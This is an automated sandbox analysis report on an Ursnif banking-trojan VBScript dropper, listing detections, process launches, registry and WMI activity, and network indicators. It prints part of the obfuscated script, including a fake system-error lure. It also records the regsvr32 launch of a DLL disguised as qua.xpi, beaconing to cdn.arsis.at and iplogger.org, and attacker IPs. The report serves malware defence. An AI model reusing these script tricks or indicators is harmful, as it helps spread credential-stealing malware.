
Analysis Report amendments#_47148.vbs

Overview

General Information

Sample Name: amendments#_47148.vbs
MD5: de25f443cc3bd5ccf14d1b514e909bb3
SHA1: a74c82a1b059e4be6a234920092440948e40faf0
SHA256: 1dcd128cc38a01779a240eeaec7b498107509e15f5d806c483644d9c1e4b9b8b

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates a COM Internet Explorer object
Creates processes via WMI
Deletes itself after installation
Machine Learning detection for dropped file
Sigma detected: Regsvr32 Anomaly
Writes or reads registry keys via WMI
Writes registry values via WMI
Abnormal high CPU Usage
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5088 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\amendments#_47148.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 3788 cmdline: regsvr32 -s C:\Users\user\AppData\Local\Temp\qua.xpi MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 932 cmdline: -s C:\Users\user\AppData\Local\Temp\qua.xpi MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 5828 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5556 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000003.1149110295.0000000005698000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.1149197062.0000000005698000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.1148486257.0000000005698000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.1148805771.0000000005698000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.1148976781.0000000005698000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly
Source: Process started | Author: Florian Roth | Data: Command: -s C:\Users\user\AppData\Local\Temp\qua.xpi, CommandLine: -s C:\Users\user\AppData\Local\Temp\qua.xpi, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -s C:\Users\user\AppData\Local\Temp\qua.xpi, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 3788, ProcessCommandLine: -s C:\Users\user\AppData\Local\Temp\qua.xpi, ProcessId: 932

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: cdn.arsis.at | Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\qua.xpi | Virustotal: Detection: 22%
Source: C:\Users\user\AppData\Local\Temp\qua.xpi | ReversingLabs: Detection: 25%
Multi AV Scanner detection for submitted file
Source: amendments#_47148.vbs | Virustotal: Detection: 8%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\qua.xpi | Joe Sandbox ML: detected

Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: Joe Sandbox View | IP Address: 47.241.8.147
Source: Joe Sandbox View | IP Address: 88.99.66.31
Source: Joe Sandbox View | IP Address: 88.99.66.31
Source: Joe Sandbox View | ASN Name: unknown
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic | HTTP traffic detected: GET /api1/AEApm14UVcYD3SWDG/_2BgFR9KhIK_/2BUpwtpWfOV/aYGPxtTf9efbh_/2FZx7cCcv6oobF4ox5E_2/FVHEesS6_2BJXZVH/NvCNTgscAdeVBOs/T5DCrxBlFScOJ7VbGq/r_2B5AQf2/_2FJFRcz22Tdn7BvGIHO/pcYaJTFNPKP1YJtKZ4D/uOgC2nSCIkMaJPqU1jPiU3/6F8AiOKK2EXVu/mCZ490jj/ufri_2Boq9L1nf7r5wEMFia/eSw6kD7T2G/DfNaqQglnI6VxyDn5/Dbo_0A_0DVh6/DqIj_2B6ZkG/lLZyf9hue8GKSE/tVeCANdodPFajjSLDJ2qT/fxPG_2BNGGSCmwc4/miT_2BQz/l HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: cdn.arsis.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/AEApm14UVcYD3SWDG/favicon.ico HTTP/1.1 | User-Agent: AutoIt | Host: cdn.arsis.at
Source: unknown | DNS traffic detected: queries for: iplogger.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 23 Jun 2020 14:09:52 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip | Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410
Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmp | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmp | String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmp | String found in binary or memory: http://cps.letsencrypt.org0
Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmp | String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmp | String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmp | String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: wscript.exe, 00000000.00000003.783201583.000002AD44F91000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/1bD467
Source: wscript.exe, 00000000.00000003.781986547.000002AD44F84000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.849852508.000002AD460AA000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/1bP467
Source: wscript.exe, 00000000.00000003.834537702.000002AD45E58000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/1bP467pace
Source: wscript.exe, 00000000.00000003.814871793.000002AD481A1000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/b?
Source: wscript.exe, 00000000.00000003.842100899.000002AD4843B000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/sion
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.1149110295.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1149197062.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1148486257.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1148805771.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1148976781.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1148674591.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1148901441.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1149054686.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 932, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.1149110295.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1149197062.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1148486257.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1148805771.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1148976781.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1148674591.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1148901441.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1149054686.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 932, type: MEMORY

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | Process Stats: CPU usage > 98%
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E6415F3 NtMapViewOfSection, 3_2_6E6415F3
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E6418DB NtCreateSection,memset, 3_2_6E6418DB
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E642775 NtQueryVirtualMemory, 3_2_6E642775
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E642554 3_2_6E642554
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\qua.xpi 49FC4C06CF9FFA149CE9D9D03F354197B54B605291FC94835FAB1ABE9E9C9626
Source: amendments#_47148.vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: classification engine | Classification label: mal100.bank.troj.evad.winVBS@7/7@4/2
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\amendments#_47148.vbs'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: amendments#_47148.vbs | Virustotal: Detection: 8%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\amendments#_47148.vbs'
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\user\AppData\Local\Temp\qua.xpi
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\qua.xpi
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\qua.xpi
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: amendments#_47148.vbs | Static file information: File size 1079613 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
Source: Binary string: c:\Quite\pitch\east\And\Even\start\middle\next.pdb source: wscript.exe, 00000000.00000003.804282475.000002AD44FAE000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.1201151907.000000006E66A000.00000002.00020000.sdmp, qua.xpi.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(270546191)) > 0 And dMGq = 0) ThenExit FunctionEnd IfJDE = 15if (JDE > ((53 - 6.0) + (-(48 - (35 + (-24.0)))))) Thenflw = Array(203)Dim neuron:Set neuron = CreateObject("WScript.Shell")sqTSE = neuron.RegRead("HKEY_CURRENT_USER\Control Panel\International\Geo\Nation")For Each hind In flwIf (hind = Cint(sqTSE)) ThenREM Steven mulatto technology resiny Bauhaus Cummins conservator. cumbersome Strom hasp mandrill too procaine extirpate sergeant, 6138352 Judaism sale typewritten farmhouse deuteron Malagasy delineate gossamer adolescent, marital Ferguson homogeneity. evaporate Ephraim hair, 7115897 failure. Platonism decode antiquarian, 5508839 militia embargo director coruscate wreath40("")BlombergFujitsuWScript.Quit' flatulent Frye sinew Ulster Debussy spectrometer parade Carbone, Thoreau anyone Grayson polecat panther Morrison apache psychophysic, whimsey executrix Dailey sucrose buxom memory victim flipflop inboard. 1947492 emphatic fluorite Greenbelt End IfNext' progress buteo fungicide nameplate Bolton mockernut Gilchrist click sexy, beady. myocardial phalarope sigma Dorado lump umbra Alton246 wilful foxhole103 psychosomatic ironbound forgo cubit stratospheric motive, 2477469 shift chief Nigeria End ifEnd FunctionFunction Fujitsu()inventive = MsgBox("The program cant start because MSVCR100.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")End FunctionFunction zJOk()REM foothill807 seraphim tarnish Levis. figaro rambunctious fail doomsday disembowel bug permute315 seder sabra whatever morsel bottle ingather curb entrant pudding, 771336 phobic mystic methyl. inapt on error resume next' hydrodynamic. 2432209 airflow chromosomal Jacques those millenarian Lynn trivia. 7572830 Janus happen303 jackdaw. 
aliphatic aggregate Rosetta Tarrytown McLeod bookmark medic902 relevant Caracas Hindu cadre cannel Barrett bookbind soar shortcoming, Pauli If (InStr(WScript.ScriptName, cStr(270546191)) > 0 And dMGq = 0) ThenExit FunctionEnd Ifset SxK = GetObject("winmgmts:\\.\root\cimv2")set jPuBlOS = SxK.InstancesOf("Win32_OperatingSystem")REM thou impartation Welles ibid arsenide mediate autopsy deprave soar435 majestic, 7805098 candlelight broad Formosa rotary handbook sweep Blackwell jive sandwich automorphism. hereditary lovebird, 2350665 woodcut develop evocate peanut blitz solipsism impasse symbolic riverbank ventilate searchlight orthodontic detriment oratoric vacuole for each surmount in jPuBlOS' eggplant, 1640424 beehive stinkbug Matson laconic chianti visitor. 6763580 failsafe Strickland triphammer glandular parabola mannitol ANSI Dow megabyte. quota deed wigging. Toni = surmount.LastBootUpTimeREM season hillock grief Dairylea jejune slurry, 2899406 Kaufman colonel pragmatic packet Hellenic545 veterinary. Rockefeller polymeric bough Bahama life Waterman common businessmen dolce hunk Bridget. inhabitant deformation polyandrous market Katowice anam
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E6424F0 push ecx; ret 3_2_6E6424F9
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E642543 push ecx; ret 3_2_6E642553
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E657A7B push ebp; ret 3_2_6E657AC8
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E658003 push ebp; iretd 3_2_6E658017
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E6556F4 push es; iretd 3_2_6E6556F5
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E655EC4 push dword ptr [ebp+597C1BE8h]; retf 3_2_6E655ECA
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E6547EE push edi; ret 3_2_6E6547EF
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E657BD0 push ebp; iretd 3_2_6E657BD4
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E654F90 push ecx; ret 3_2_6E654FB8
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E68237B push edx; ret 3_2_6E68237C
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E6827E2 push ds; retf 3_2_6E6827EB

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\qua.xpi
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\qua.xpi

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.1149110295.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1149197062.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1148486257.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1148805771.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1148976781.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1148674591.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1148901441.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1149054686.0000000005698000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 932, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\amendments#_47148.vbs
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe TID: 5172 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: wscript.exe, 00000000.00000002.854155251.000002AD489A0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.852842773.000002AD4821B000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.849852508.000002AD460AA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW<"H
Source: wscript.exe, 00000000.00000002.854155251.000002AD489A0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.854155251.000002AD489A0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.854155251.000002AD489A0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E641FA6 LdrInitializeThunk,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_6E641FA6
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E67F519 mov eax, dword ptr fs:[00000030h] 3_2_6E67F519
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E67F44F mov eax, dword ptr fs:[00000030h] 3_2_6E67F44F
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E67F059 push dword ptr fs:[00000030h] 3_2_6E67F059
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E641E95 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError, 3_2_6E641E95

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe | File created: qua.xpi.0.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe | Network Connect: 88.99.66.31 187
Source: regsvr32.exe, 00000002.00000002.1198250312.0000000001270000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1199411180.0000000003440000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: regsvr32.exe, 00000002.00000002.1198250312.0000000001270000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1199411180.0000000003440000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000002.00000002.1198250312.0000000001270000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1199411180.0000000003440000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: regsvr32.exe, 00000002.00000002.1198250312.0000000001270000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1199411180.0000000003440000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 3_2_6E641E58
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Mozart.zip VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E641BB9 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 3_2_6E641BB9
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_6E64177C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 3_2_6E64177C
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara match, file source: 00000003.00000003.1149110295.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000003.1149197062.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000003.1148486257.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000003.1148805771.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000003.1148976781.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000003.1148674591.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000003.1148901441.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: 00000003.00000003.1149054686.0000000005698000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match, file source: Process Memory Space: regsvr32.exe PID: 932, type: MEMORY

